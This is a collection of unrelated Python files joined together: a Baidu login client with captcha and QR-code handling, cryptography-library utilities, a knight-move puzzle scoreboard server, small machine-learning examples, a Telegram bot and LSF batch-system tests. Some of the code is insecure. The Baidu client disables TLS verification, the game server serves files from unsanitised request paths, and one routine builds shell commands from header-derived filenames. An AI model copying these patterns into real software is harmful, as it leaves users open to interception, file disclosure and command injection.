return True
if not (self.username and self.password):
print u"从cookie文件加载配置失败,请提供用户名密码!"
return False
URL_BAIDU_TOKEN = 'https://passport.baidu.com/v2/api/?getapi&tpl=pp&apiver=v3&class=login'
URL_BAIDU_LOGIN = 'https://passport.baidu.com/v2/api/?login'
tokenReturn = requests.get(URL_BAIDU_TOKEN, verify=False).content
matchVal = re.search(u'"token" : "(?P<tokenVal>.*?)"', tokenReturn)
self.tokenVal = matchVal.group('tokenVal')
postData = {
'username': self.username,
'password': self.password,
'u': 'https://passport.baidu.com/',
'tpl': 'pp',
'token': self.tokenVal,
'staticpage': 'https://passport.baidu.com/static/passpc-account/html/v3Jump.html',
'isPhone': 'false',
'charset': 'UTF-8',
'callback': 'parent.bd__pcbs__ra48vi'
}
params = urllib.urlencode(postData)
header = HEADER
header['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
header['Accept-Encoding'] = 'gzip,deflate,sdch'
header['Accept-Language'] = 'zh-CN,zh;q=0.8'
header[
'User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36'
header['Content-Type'] = 'application/x-www-form-urlencoded'
r = requests.post(URL_BAIDU_LOGIN, data=params, headers=header, verify=False)
self.BAIDU_CHANGE_CAP = "https://passport.baidu.com/v2/?reggetcodestr&token=" + self.tokenVal + \
'&tpl=mn&apiver=v3&tt=' + get_tt() + '&fr=login'
if int(r.status_code) != 200:
raise NetworkError(), u'表单上传失败'
if not self.islogin():
postData['verifycode'], postData['codestring'] = self.__download_captcha()
params = urllib.urlencode(postData)
r = requests.post(URL_BAIDU_LOGIN, data=params, headers=header, verify=False)
if r.status_code == 200:
requests.cookies.save(ignore_discard=True, ignore_expires=True)
else:
print(u"发生未知错误!")
else:
requests.cookies.save(ignore_discard=True, ignore_expires=True)
print u"登录成功"
return True
# 20160302修改
# if self.islogin():
# print u"登录成功"
# return True
# else:
# raise NetworkError(), u"Username or Password error! Please check!"
def login_qrcode(self):
"""
通过扫描二维码登录百度
:return: True or False
"""
if self.islogin():
print u"已从cookie加载配置,登录成功!"
return True
else:
print u"请用手机百度扫描二维码登录!"
global gid
global bduss
gid = self.create_gid()
params = {
"lp": "pc",
"gid": gid,
"apiver": "v3",
"tt": get_tt(),
"callback": "bd__cbs__zh5cgp",
}
BdQrUrl = "https://passport.baidu.com/v2/api/getqrcode"
BdQrGetUrl = "http://passport.baidu.com/v2/api/qrcode?sign="
headers = HEADER
req = requests.get(url=BdQrUrl, params=params, headers=headers, allow_redirects=False, verify=False)
if req.status_code != 200:
raise NetworkError(), u"发生未知错误!"
sign_id = re.findall('"sign":"([\w]*)"', req.text)[0]
BdQrGetUrl += sign_id
r = requests.get(url=BdQrGetUrl, headers=HEADER, verify=False)
if int(r.status_code) != 200:
raise NetworkError(), u"二维码请求失败!"
image_name = u"qrcode." + r.headers['content-type'].split("/")[1]
open(image_name, "wb").write(r.content)
self.open_img(image_name)
# 下面判断是否已经扫码并登录
params = {
"channel_id": sign_id,
"tpl": "mn",
"gid": gid,
"apiver": "v3",
"callback": "bd__cbs__j7a2vw",
"tt": get_tt(),
}
BdQrExist = "https://passport.baidu.com/channel/unicast"
status = 1
while status == 1:
try:
# 返回0是表示已经扫描,返回1表示还未扫描
text = requests.get(url=BdQrExist, params=params, headers=headers, allow_redirects=False,
verify=False).content
status = int(re.findall('"errno":([0-1]*)', text)[0])
print u"请按手机的提示操作!"
except Exception as e:
print e
# 下面判断是否点击登录,并获取得到bduss的v
while status == 0:
try:
text = requests.get(url=BdQrExist, params=params, headers=headers, allow_redirects=False,
verify=False).content
v = re.findall(r'\\"v\\":\\"([\w]*)\\"', text)[0]
print(u"获取关键参数V成功!")
status = 1
except Exception as e:
print e
# 再进行登录操作,通过v获取bduss
params = {
"u": "https://www.baidu.com/",
"bduss": v,
"tpl": "mn",
"gid": gid,
"apiver": "v3",
"callback": "bd__cbs__551o7a",
"tt": get_tt(),
}
BdLoginUrl = "https://passport.baidu.com/v2/api/bdusslogin"
req = requests.get(url=BdLoginUrl, params=params, headers=headers, allow_redirects=False)
if req.status_code == 200:
requests.cookies.save(ignore_discard=True, ignore_expires=True)
print(u"登录成功!")
return True
else:
print u"未知错误!可能百度修改了接口!"
def fetch(self, url):
r = requests.get(url, allow_redirects=False, verify=False).content
return r
def islogin(self):
"""
判断是否已经成功登录
:return: True or False
"""
header = HEADER
header['Accept-Encoding'] = 'gzip, deflate, sdch'
header['Referer'] = 'https://www.baidu.com/'
url = "http://i.baidu.com/"
r = requests.get(url, headers=header, allow_redirects=False, verify=False)
status_code = int(r.status_code)
if status_code == 302:
return False
elif status_code == 200:
# ignore_discard: save even cookies set to be discarded.
# ignore_expires: save even cookies that have expiredThe file is overwritten if it already exists
requests.cookies.save(ignore_discard=True, ignore_expires=True)
return True
else:
raise NetworkError, u'网络故障'
def __change_cap_url(self):
"""
获取百度登录验证码地址
:return:
"""
r = requests.get(self.BAIDU_CHANGE_CAP, headers=HEADER, verify=False)
status_code = int(r.status_code)
# print r.content
if status_code == 200:
msg = json.loads(r.content)
return msg["data"]["verifyStr"]
def __download_captcha(self):
"""
下载验证码
:return:
"""
codeString = self.__change_cap_url()
url = BAIDU_CAT_URL_MAIN + codeString
r = requests.get(url, headers=HEADER, verify=False)
if int(r.status_code) != 200:
raise NetworkError(), u"验证码请求失败"
image_name = u"verify." + r.headers['content-type'].split("/")[1]
open(image_name, "wb").write(r.content)
self.open_img(image_name)
verifycode = raw_input(u"Please enter the captcha:")
return self.__check_captcha(verifycode, codeString)
def __check_captcha(self, verifycode, codeString):
"""
查询验证码正确与否
:param verifycode:
:param codeString:
:return:
"""
check_url = "https://passport.baidu.com/v2/?checkvcode&token=" \
+ self.tokenVal + "&tpl=mn&apiver=v3&tt=" + get_tt() + "&verifycode=" + verifycode + "&codestring=" + codeString + \
"&callback=bd__cbs__r4gm19"
r = requests.get(check_url, headers=HEADER, verify=False)
if "success" not in r.content:
print u"验证输入错误,请重新输入!\n" \
u"或者帐号密码错误,请确认!"
self.__download_captcha()
else:
return verifycode, codeString
def postdata(self, url, param, headers):
req = requests.post(url, data=param, headers=headers, verify=False)
return req
@staticmethod
def create_gid():
"""
创建随机的gid,获取bduss需要用到
:return:
"""
from random import random
key = ''
for i in xrange(7):
key += hex(int(random() * 16))[2:]
key += '-'
for i in xrange(4):
key += hex(int(random() * 16))[2:]
key += '-4'
for i in xrange(3):
key += hex(int(random() * 16))[2:]
key += '-'
for i in xrange(4):
key += hex(int(random() * 16))[2:]
key += '-'
for i in xrange(12):
key += hex(int(random() * 16))[2:]
return key.upper()
@staticmethod
def open_img(image_name):
"""
打开图片验证码和二维码方法
:param image_name:
:return:
"""
print u"正在调用外部程序渲染验证码...\n" \
u"或者手动打开代码目录下'{}'文件查看并填写验证码!".format(image_name)
if platform.system() == "Linux":
print u"Command: xdg-open %s &" % image_name
os.system("xdg-open %s &" % image_name)
elif platform.system() == "Darwin":
print u"Command: open %s &" % image_name
os.system("open %s &" % image_name)
elif platform.system() == "SunOS":
os.system("open %s &" % image_name)
elif platform.system() == "FreeBSD":
os.system("open %s &" % image_name)
elif platform.system() == "Unix":
os.system("open %s &" % image_name)
elif platform.system() == "OpenBSD":
os.system("open %s &" % image_name)
elif platform.system() == "NetBSD":
os.system("open %s &" % image_name)
elif platform.system() == "Windows":
os.startfile(image_name)
else:
print u"我们无法探测你的作业系统,请自行打开验证码 %s 文件,并输入验证码:" % os.path.join(os.getcwd(), image_name) |
import abc
import logging
import os
from contextlib import contextmanager
from datetime import datetime, timezone
from json import JSONDecodeError
from typing import List, Optional, Sequence, Union, BinaryIO
import multitimer
import schema
import uuid0
from bson.binary import UuidRepresentation
from bson.json_util import dumps, loads, JSONOptions, JSONMode
from decorator import decorator
from schema import SchemaError, Schema
from wacryptolib import _crypto_backend
from wacryptolib.exceptions import SchemaValidationError
logger = logging.getLogger(__name__)
UTF8_ENCODING = "utf8"
WACRYPTOLIB_JSON_OPTIONS = JSONOptions(
json_mode=JSONMode.CANONICAL, # Preserve all type information
uuid_representation=UuidRepresentation.STANDARD, # Same as PythonLegacy
tz_aware=True, # All our serialized dates are UTC, not NAIVE
)
### Private utilities ###
def get_utc_now_date():
"""Return current datetime with UTC timezone."""
return datetime.now(tz=timezone.utc)
def is_datetime_tz_aware(dt):
return dt.utcoffset() is not None
def check_datetime_is_tz_aware(dt):
"""Raise if datetime is naive regarding timezones."""
is_aware = is_datetime_tz_aware(dt)
if not is_aware:
raise ValueError("Naive datetime was encountered: %s" % dt)
@decorator
def synchronized(func, self, *args, **kwargs):
"""
Wraps the function call with a mutex locking on the expected "self._lock" mutex.
"""
with self._lock:
return func(self, *args, **kwargs)
@contextmanager
def catch_and_log_exception(context_message):
"""Logs and stops any exception in the managed code block or the decorated function"""
assert isinstance(context_message, str), context_message
try:
yield
except Exception as exc:
logger.critical("Abnormal exception caught in %s: %r", context_message, exc, exc_info=True)
def get_memory_rss_bytes():
import psutil
process = psutil.Process(os.getpid())
rss = process.memory_info().rss # in bytes
return rss
def delete_filesystem_node_for_stream(stream: BinaryIO):
"""Deletes the corresponding filesystem node if it exists."""
filename = getattr(stream, "name", None)
if filename and os.path.exists(filename): # Can't be false on Win32, since files are not deletable when open
os.remove(filename) # We let errors flow here!
### Public utilities ###
#: Hash algorithms authorized for use with `hash_message()`
SUPPORTED_HASH_ALGOS = ["SHA256", "SHA512", "SHA3_256", "SHA3_512"]
def hash_message(message: bytes, hash_algo: str):
"""Hash a message with the selected hash algorithm, and return the hash as bytes."""
if hash_algo not in SUPPORTED_HASH_ALGOS:
raise ValueError("Unsupported hash algorithm %r" % hash_algo)
hasher = _crypto_backend.get_hasher_instance(hash_algo)
hasher.update(message)
digest = hasher.digest()
assert 32 <= len(digest) <= 64, len(digest)
return digest
def consume_bytes_as_chunks(data: Union[bytes, BinaryIO], chunk_size: int): # FIXME DOCUMENT AND TEST ME
"""Automatically deletes filesystem entry if it exists!"""
if hasattr(data, "read"): # File-like BinaryIO object
while True:
chunk = data.read(chunk_size)
if not chunk:
break
yield chunk
data.close()
delete_filesystem_node_for_stream(data)
else: # Object with a len()
for i in range(0, len(data), chunk_size):
yield data[i : i + chunk_size] # TODO use memoryview to optimize?
def split_as_chunks(
bytestring: bytes, *, chunk_size: int, must_pad: bool, accept_incomplete_chunk: bool = False
) -> List[bytes]:
"""Split a `bytestring` into chunks (or blocks)
:param bytestring: element to be split into chunks
:param chunk_size: size of a chunk in bytes
:param must_pad: whether the bytestring must be padded first or not
:param accept_incomplete_chunk: do not raise error if a chunk with a length != chunk_size is obtained
:return: list of bytes chunks"""
assert chunk_size > 0, chunk_size
if must_pad:
bytestring = _crypto_backend.pad_bytes(bytestring, block_size=chunk_size)
if len(bytestring) % chunk_size and not accept_incomplete_chunk:
raise ValueError("If no padding occurs, bytestring must have a size multiple of chunk_size")
chunks_count = (len(bytestring) + chunk_size - 1) // chunk_size
chunks = []
for i in range(chunks_count):
chunk = bytestring[i * chunk_size : (i + 1) * chunk_size]
chunks.append(chunk)
return chunks
def recombine_chunks(chunks: Sequence[bytes], *, chunk_size: int, must_unpad: bool) -> bytes:
"""Recombine chunks which were previously separated.
:param chunks: sequence of bytestring parts
:param chunk_size: size of a chunk in bytes (only used for error checking, when unpadding occurs)
:param must_unpad: whether the bytestring must be unpadded after recombining, or not
:return: initial bytestring"""
bytestring = b"".join(chunks)
if must_unpad:
bytestring = _crypto_backend.unpad_bytes(bytestring, block_size=chunk_size)
return bytestring
def dump_to_json_str(data, **extra_options):
"""
Dump a data tree to a json representation as string.
Supports advanced types like bytes, uuids, dates...
"""
sort_keys = extra_options.pop("sort_keys", True)
json_str = dumps(data, sort_keys=sort_keys, json_options=WACRYPTOLIB_JSON_OPTIONS, **extra_options)
return json_str
def load_from_json_str(data, **extra_options):
"""
Load a data tree from a json representation as string.
Supports advanced types like bytes, uuids, dates...
Raises exceptions.ValidationError on loading error.
"""
assert isinstance(data, str), data
try:
return loads(data, json_options=WACRYPTOLIB_JSON_OPTIONS, **extra_options)
except JSONDecodeError as exc:
raise SchemaValidationError("Invalid JSON string: %r" % exc) from exc
def dump_to_json_bytes(data, **extra_options):
"""
Same as `dump_to_json_str`, but returns UTF8-encoded bytes.
"""
json_str = dump_to_json_str(data, **extra_options)
return json_str.encode(UTF8_ENCODING)
def load_from_json_bytes(data, **extra_options):
"""
Same as `load_from_json_str`, but takes UTF8-encoded bytes as input.
"""
json_str = data.decode(UTF8_ENCODING)
return load_from_json_str(data=json_str, **extra_options)
def dump_to_json_file(filepath, data, **extra_options):
"""
Same as `dump_to_json_bytes`, but writes data to filesystem (and returns bytes too).
"""
json_bytes = dump_to_json_bytes(data, **extra_options)
with open(filepath, "wb") as f:
f.write(json_bytes)
return json_bytes
def load_from_json_file(filepath, **extra_options):
"""
Same as `load_from_json_bytes`, but reads data from filesystem.
"""
with open(filepath, "rb") as f:
json_bytes = f.read()
return load_from_json_bytes(json_bytes, **extra_options)
def generate_uuid0(ts: Optional[float] = None):
"""
Generate a random UUID partly based on Unix timestamp (not part of official "variants").
Uses 6 bytes to encode the time and does not encode any version bits, leaving 10 bytes (80 bits) of random data.
When just transmitting these UUIDs around, the stdlib "uuid" module does the job fine, no need for uuid0 lib.
:param ts: optional timestamp to use instead of current time (if not falsey)
:return: uuid0 object (subclass of UUID)
"""
return uuid0.generate(ts)
def gather_data_as_blocks(first_data: bytes, second_data: bytes, block_size: int):
"""PRIVATE API
Split the sum of two bytestrings between a data payload with a size multiple of block_size,
and remainder.
:return: memory view of formatted data and remainder
"""
assert block_size > 0, block_size
full_data = first_data + second_data
formatted_length = (len(full_data) // block_size) * block_size
formatted_data = memoryview(full_data[0:formatted_length])
remainder = full_data[formatted_length:]
return formatted_data, remainder
class TaskRunnerStateMachineBase(abc.ABC):
"""
State machine for all sensors/players, checking that the order of start/stop/join
operations is correct.
The two-steps shutdown (`stop()`, and later `join()`) allows caller to
efficiently and safely stop numerous runners.
"""
def __init__(self, **kwargs): # Ignored exceeding kwargs here
self._runner_is_started = False
@property
def is_running(self):
return self._runner_is_started
def start(self):
"""Start the periodic system which will poll or push the value."""
if self._runner_is_started:
raise RuntimeError("Can't start an already started runner")
self._runner_is_started = True
def stop(self):
"""Request the periodic system to stop as soon as possible."""
if not self._runner_is_started:
raise RuntimeError("Can't stop an already stopped runner")
self._runner_is_started = False
def join(self):
"""
Wait for the periodic system to really finish running.
Does nothing if periodic system is already stopped.
"""
if self._runner_is_started:
raise RuntimeError("Can't join an in-progress runner")
class PeriodicTaskHandler(TaskRunnerStateMachineBase):
"""
This class runs a task at a specified interval, with start/stop/join controls.
If `task_func` argument is not provided, then `_offloaded_run_task()` must be overridden by subclass.
"""
from multitimer import RepeatingTimer as _RepeatingTimer
# TODO make PR upstream to ensure that multitimer is a DAEMON thread!
assert hasattr(_RepeatingTimer, "daemon")
_RepeatingTimer.daemon = True # Do not prevent process shutdown if we forgot to stop...
_task_func = None # Might be overridden as a method too!
def __init__(self, interval_s, count=-1, runonstart=True, task_func=None, **kwargs):
super().__init__(**kwargs)
self._interval_s = interval_s
if task_func: # Important
self._task_func = task_func
self._multitimer = multitimer.MultiTimer(
interval=interval_s, function=self._private_launch_offloaded_run_task, count=count, runonstart=runonstart
)
def _private_launch_offloaded_run_task(self):
"""Wrapper to ensure that offloaded task will not be run if
state machine has just been stopped concurrently"""
if not self.is_running: # pragma: no cover
return # In case of race condition (too hard to test)...
return self._offloaded_run_task()
def _offloaded_run_task(self):
"""Method which will be run periodically by background thread,
and which by default simply calls task_func() and returns the result.
MEANT TO BE OVERRIDDEN BY SUBCLASS
"""
return self._task_func()
def start(self):
"""Launch the secondary thread for periodic task execution."""
super().start()
self._multitimer.start()
def stop(self):
"""Request the secondary thread to stop. If it's currently processing data,
it will not stop immediately, and another offloaded operation might happen."""
super().stop()
self._multitimer.stop()
def join(self): # TODO - add a join timeout everywhere?
"""
Wait for the secondary thread to really exit, after `stop()` was called.
When this function returns, no more offloaded operation will happen,
until the next `start()`.
"""
super().join()
timer_thread = self._multitimer._timer
if timer_thread:
assert timer_thread.stopevent.is_set()
timer_thread.join()
# Validation-related utilities
def validate_data_against_schema(data_tree, schema: Schema):
"""
Validate data against provided python-schema, and raise SchemaValidationError if problems occur.
"""
try:
schema.validate(data_tree)
except SchemaError as exc:
raise SchemaValidationError("Error validating data tree with python-schema: {}".format(exc)) from exc
def convert_native_tree_to_extended_json_tree(data): # FIXME push to docs?
"""
Turn a native python tree (including UUIDs, bytes etc.) into its representation
as Pymongo extended json (with nested $binary, $numberInt etc.)
"""
import json
# Export to pymongo extended json format string
json_str = dump_to_json_str(data)
# Parse standard Json from string, without advanced type coercion
data_tree = json.loads(json_str)
return data_tree
def get_validation_micro_schemas(extended_json_format=False): # FIXME push to docs?
"""
Get python-schema compatible microschemas for basic types,
for their python or extended-json representations.
"""
import uuid
micro_schema_uid = uuid.UUID # BASE CLASS, not uuid0's subclass
micro_schema_binary = bytes
micro_schema_int = int
if extended_json_format:
_micro_schema_integer = schema.And(str, schema.Regex(r"^[+-]?\d+$"))
_micro_schema_base64 = schema.And(
str, schema.Regex(r"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$")
)
micro_schema_uid = {
"$binary": {"base64": _micro_schema_base64, "subType": schema.Or("03", "04")}
} # Type 04 is the future!
micro_schema_binary = {"$binary": {"base64": _micro_schema_base64, "subType": "00"}}
micro_schema_int = schema.Or({"$numberInt": _micro_schema_integer}, {"$numberLong": _micro_schema_integer})
class MicroSchemas:
schema_uid = micro_schema_uid
schema_binary = micro_schema_binary
schema_int = micro_schema_int
return MicroSchemas
|
from http.server import BaseHTTPRequestHandler,HTTPServer
from operator import itemgetter
import json, os, time
PORT_NUMBER = 8013
FIELDS_INFO = {
(6, 6): ((3, 3), (4, 5)),
(7, 7): ((3, 3), (4, 6)),
(8, 8): ((3, 3), (4, 6)),
(10, 10): ((3, 3), (4, 6)),
}
# max count of saved result
DB_SIZE = 100
class SecurityError(Exception):
def __init__(self, message):
self.message = message
def process(data: str) -> tuple:
ddict = json.loads(data)
line_bad = ddict["points"]
name = ddict["name"]
if name == "" or len(name) > 100 or line_bad is None:
return ("", None)
line = [(i[0], i[1]) for i in line_bad]
x = [i[0] for i in line_bad]
y = [i[1] for i in line_bad]
return (name, (line, x, y))
def cross_product(a: tuple, b: tuple) -> tuple:
return a[0] * b[1] - a[1] * b[0]
def intersect(segment1: tuple, segment2: tuple) -> bool:
x1, y1, x2, y2, x3, y3, x4, y4 = segment1[0][0], segment1[0][1], segment1[1][0], segment1[1][1], segment2[0][0], segment2[0][1], segment2[1][0], segment2[1][1]
a = cross_product((x2 - x1, y2 - y1), (x3 - x1, y3 - y1)) * cross_product((x2 - x1, y2 - y1), (x4 - x1, y4 - y1))
b = cross_product((x4 - x3, y4 - y3), (x1 - x3, y1 - y3)) * cross_product((x4 - x3, y4 - y3), (x2 - x3, y2 - y3))
if a <= 0 and b <= 0:
if a == 0 and b == 0:
return False
return True
return False
def verify_and_calc(data: tuple, field_size: tuple, ends: tuple) -> int:
line, x, y = data
knight_dir = [(1, 2), (2, 1), (-1, 2), (2, -1), (-2, 1), (1, -2), (-1, -2), (-2, -1)]
if len(line) == 0:
raise SecurityError("STOP CHEATING! BAN! (Chain must be not empty)")
if (len(set(line)) != len(line)):
raise SecurityError("STOP CHEATING! BAN! (Points must be unique)")
if (max(y) >= field_size[1] or min(y) < 0 or max(x) >= field_size[0] or min(x) < 0):
raise SecurityError("STOP CHEATING! BAN! (Your chain is out of bounds!)")
if (tuple(field_size) not in FIELDS_INFO):
raise SecurityError("STOP CHEATING! BAN! (Incorrect field size)")
if ((x[0], y[0]) != ends[0] or (x[-1], y[-1]) != ends[1]):
raise SecurityError("STOP CHEATING! BAN! (Your chain has incorrect ends!)")
for i in range(1, len(line)):
if ((line[i][0]-line[i-1][0], line[i][1]-line[i-1][1]) not in knight_dir):
raise SecurityError("STOP CHEATING! BAN! (Segments must be like a knight move)")
for i in range(1, len(line)):
for j in range(i+2, len(line)):
if (intersect((line[i-1], line[i]), (line[j-1], line[j]))):
raise SecurityError("STOP CHEATING! BAN! (Segments must not intersect)")
return len(line) - 1
def save_results(result: tuple, field_size: tuple) -> None:
if not os.path.isdir("Results"):
os.mkdir("Results")
fname = os.path.join("Results", "table_" + str(field_size[0]) + '_' + str(field_size[1]) + ".json")
if not os.path.isfile(fname):
f = open(fname, 'w', encoding="utf-8")
f.write("{}")
f.close()
f = open(fname, encoding="utf-8")
a = json.load(f)
f.close()
if (not result[0] in a.keys()):
a[result[0]] = result[1]
a[result[0]] = max(a[result[0]], result[1])
a = dict(sorted(a.items(), reverse=True, key=itemgetter(1, 0))[:DB_SIZE])
f = open(fname, 'w', encoding="utf-8")
json.dump(a, f, indent=4, ensure_ascii=False)
f.close()
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == "":
self.path = "/index.html"
try:
sendReply = False
if self.path.endswith(".html"):
mimetype = "text/html"
sendReply = True
if self.path.endswith(".json"):
mimetype = "text/plain"
sendReply = True
if self.path.endswith(".js"):
mimetype = "application/javascript"
sendReply = True
if self.path.endswith(".png"):
mimetype = "image/png"
sendReply = True
if self.path.endswith(".css"):
mimetype = "text/css"
sendReply = True
if self.path.endswith(".ico"):
mimetype = "image/icon"
sendReply = True
if self.path.endswith(".svg"):
mimetype = "image/svg+xml"
sendReply = True
if sendReply:
f = open("." + self.path, "rb")
self.send_response(200)
self.send_header("Content-type", mimetype)
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404, "File Not Found: " + self.path)
def do_POST(self):
content_length = int(self.headers["Content-Length"])
name, data = process(self.rfile.read(content_length).decode("utf8"))
if (data is None or name == ""):
return
field_size = (int(self.headers["Field-Size-X"]), int(self.headers["Field-Size-Y"]))
try:
result = verify_and_calc(data, field_size, FIELDS_INFO.get(field_size))
except SecurityError as e:
self.send_error(403, e.message)
return
print(name, field_size, "Score =", result, data[0])
save_results((name, result), field_size)
self.send_response(200)
self.send_header("Content-type", "")
self.end_headers()
try:
server = HTTPServer(("", PORT_NUMBER), Handler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
|
from flask import render_template
from flask_login import login_required
from . import bp
@bp.route("/alarm")
@login_required
def alarm_idx():
return render_template("notifications/alarm.html")
|
#!/usr/bin/env python3
import os
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
data_dir = os.path.join(os.getenv('HOME'), 'var/data/mnist')
mnist = input_data.read_data_sets(data_dir, one_hot=True)
def slp(imput_size, class_number):
x = tf.placeholder(tf.float32, [None, imput_size])
W = tf.Variable(tf.zeros([imput_size, class_number]))
b = tf.Variable(tf.zeros([class_number]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
return x, y
learning_rate = 0.5
x, y = slp(28 * 28, 10)
y_ = tf.placeholder(tf.float32, [None, 10])
loss = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
optmizer = tf.train.GradientDescentOptimizer(learning_rate)
train_step = optmizer.minimize(loss)
# Train
total = 60000
batch_size = 10000
n = total // batch_size
# sess = tf.InteractiveSession()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(1, total // batch_size):
print('step: %d' % i)
xs, y_s = mnist.train.next_batch(batch_size)
train_step.run({x: xs, y_: y_s})
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
result = sess.run(acc, {x: mnist.test.images, y_: mnist.test.labels})
print('accuracy: %f' % result)
|
import pandas as pd
import numpy as np
import sklearn
import sklearn.neighbors, sklearn.preprocessing, sklearn.datasets
data = sklearn.datasets.load_boston()
targets = data['target']
scale_data = (sklearn.preprocessing.scale(X=data['data'])) # scaling data
values = np.linspace(1, 10, num=200)
acc = []
for value in values:
clf = sklearn.neighbors.KNeighborsRegressor(n_neighbors=5, weights='distance', metric='minkowski', p=value)
gener = sklearn.model_selection.KFold(n_splits=5, random_state=42, shuffle=True)
accuracy = np.mean(sklearn.model_selection.cross_val_score(clf, cv=gener, X=scale_data, y=targets,
scoring='neg_mean_squared_error'))
acc.append(accuracy)
print('max with scaling:', max(acc), acc.index(max(acc))+1)
with open('/data-out/metric.txt', 'w') as f:
f.write(str(max(acc))) # max accuracy
f.close() |
import telebot
from decouple import config
bot = telebot.TeleBot(config('BOT_TOKEN'))
def tg_send_order(message):
bot.send_message(897458587, message)
bot.send_message(945903981, message)
def check_new_updates():
updates = bot.get_updates()
for update in updates:
print(update)
|
#------------------------------------------------------------------------------
# Copyright 2008-2012 Istituto Nazionale di Fisica Nucleare (INFN)
#
# Licensed under the EUPL, Version 1.1 only (the "Licence").
# You may not use this work except in compliance with the Licence.
# You may obtain a copy of the Licence at:
#
# http://joinup.ec.europa.eu/system/files/EN/EUPL%20v.1.1%20-%20Licence.pdf
#
# Unless required by applicable law or agreed to in
# writing, software distributed under the Licence is
# distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
# See the Licence for the specific language governing
# permissions and limitations under the Licence.
#------------------------------------------------------------------------------
"""
Part of WNoDeS framework.
Interface between WNoDeS processes an the batch system LSF
"""
import unittest
import time
from wnodes.utils import command
from wnodes.utils import batch_lsf
import sys
import threading
import commands
try:
from xml.etree import ElementTree
except ImportError:
try:
from elementtree import ElementTree # pylint: disable-msg=F0401
except ImportError:
sys.exit("package ElementTree is missing, exiting.")
class BadminFake(batch_lsf.Badmin):
def get_output(self, option, status = 0):
fake_output = {0:{'hclose':'Close ...... done',
'hopen':'Open ...... done'}
}
return [status, fake_output[status][option]]
class BjobsFake(batch_lsf.Bjobs):
def get_output(self, status = 0):
ll = 'JOBID USER STAT QUEUE FROM_HOST EXEC_HOST'
ll += ' JOB_NAME SUBMIT_TIME\n4432916 superb036 RUN superb'
ll += ' ce04-lcg wn-205-01-15-02-b cr004_624025965 Mar 1 16:16'
fake_output = {0:ll,
1:'No'}
return [status, fake_output[status]]
class BkillFake(batch_lsf.Bkill):
def get_output(self):
fake_output = 'Job <%s>: Job has already finished' % self.__jobid__
return [0, fake_output]
class BmodFake(batch_lsf.Bmod):
def get_output(self):
fake_output = 'Parameter of <%s> are being changed' % self.__jobid__
return [0, fake_output]
class BreserveFake(batch_lsf.Breserve):
def get_output(self):
fake_output = ''
return [0, fake_output]
class BrunFake(batch_lsf.Brun):
def get_output(self):
fake_output = 'Job <%s> is being forced to run.' % self.__jobid__
return [0, fake_output]
class BsubFake(batch_lsf.Bsub):
def get_output(self):
fake_output = 'Job <54534534> is submitted to default queue <argo>.'
return [0, fake_output]
class BatchLsfTestCase(unittest.TestCase):
def __init__(self, method_name):
unittest.TestCase.__init__(self, method_name)
self.profile = 'pap'
def test_badmin_hclose(self):
"""test badmin hclose"""
b_admin = BadminFake(self.profile, 'hclose', 'a.b.c.d')
b_admin_cmd = b_admin.get_command()
print b_admin_cmd
b_admin_output = b_admin.get_output('hclose')
#print b_admin_output
self.assert_('Close' in b_admin_output[1])
def test_badmin_hopen(self):
"""test badmin hopen"""
b_admin = BadminFake(self.profile, 'hopen', 'a.b.c.d')
b_admin_cmd = b_admin.get_command()
print b_admin_cmd
b_admin_output = b_admin.get_output('hopen')
#print b_admin_output
self.assert_('Open' in b_admin_output[1])
def test_bjobs(self):
"""test bjobs"""
b_jobs = BjobsFake(self.profile, jobid = '', user = '')
b_jobs_cmd = b_jobs.get_command()
print b_jobs_cmd
b_jobs_output = b_jobs.get_output(status=1)
self.assertEqual('No', b_jobs_output[1])
def test_bjobs_jobid(self):
"""test bjobs with jobid"""
b_jobs = BjobsFake(self.profile, jobid = '54534534', user = '')
b_jobs_cmd = b_jobs.get_command()
print b_jobs_cmd
b_jobs_output = b_jobs.get_output(status=1)
self.assertEqual('No', b_jobs_output[1])
def test_bjobs_user(self):
"""test bjobs with user"""
b_jobs = BjobsFake(self.profile, jobid = '', user = 'joda001')
b_jobs_cmd = b_jobs.get_command()
print b_jobs_cmd
b_jobs_output = b_jobs.get_output(status=1)
self.assertEqual('No', b_jobs_output[1])
def test_bjobs_jobid_success(self):
"""test bjobs with jobid and success"""
b_jobs = BjobsFake(self.profile, jobid = '54534534', user = '')
b_jobs_cmd = b_jobs.get_command()
print b_jobs_cmd
b_jobs_output = b_jobs.get_output()
self.assert_('JOBID' in b_jobs_output[1])
def test_bkill(self):
"""test bkill"""
b_kill = BkillFake(self.profile, '54534534', user = '')
b_kill_cmd = b_kill.get_command()
print b_kill_cmd
b_kill_output = b_kill.get_output()
self.assert_('54534534' in b_kill_output[1])
def test_bkill_user(self):
"""test bkill with user"""
b_kill = BkillFake(self.profile, '54534534', user = 'joda001')
b_kill_cmd = b_kill.get_command()
print b_kill_cmd
b_kill_output = b_kill.get_output()
self.assert_('54534534' in b_kill_output[1])
def test_bmod_jobid_option(self):
"""test bmod with jobid and option"""
b_mod = BmodFake(self.profile, '-Un', '54534534')
b_mod_cmd = b_mod.get_command()
print b_mod_cmd
b_mod_output = b_mod.get_output()
self.assert_('54534534' in b_mod_output[1])
def test_breserve_add_hostname_option_user(self):
"""test breserve add with hotname, option and user"""
start_reservation = time.strftime("%m:%d:%H:%M",
time.localtime(time.time() + 70))
end_reservation = time.strftime("%m:%d:%H:%M",
time.localtime(time.time() + 200))
b_reserve = BreserveFake(self.profile, 'add', '97698789',
hostname = 'a.c.d.it', option = '-n 1 -o -b %s -e %s' %
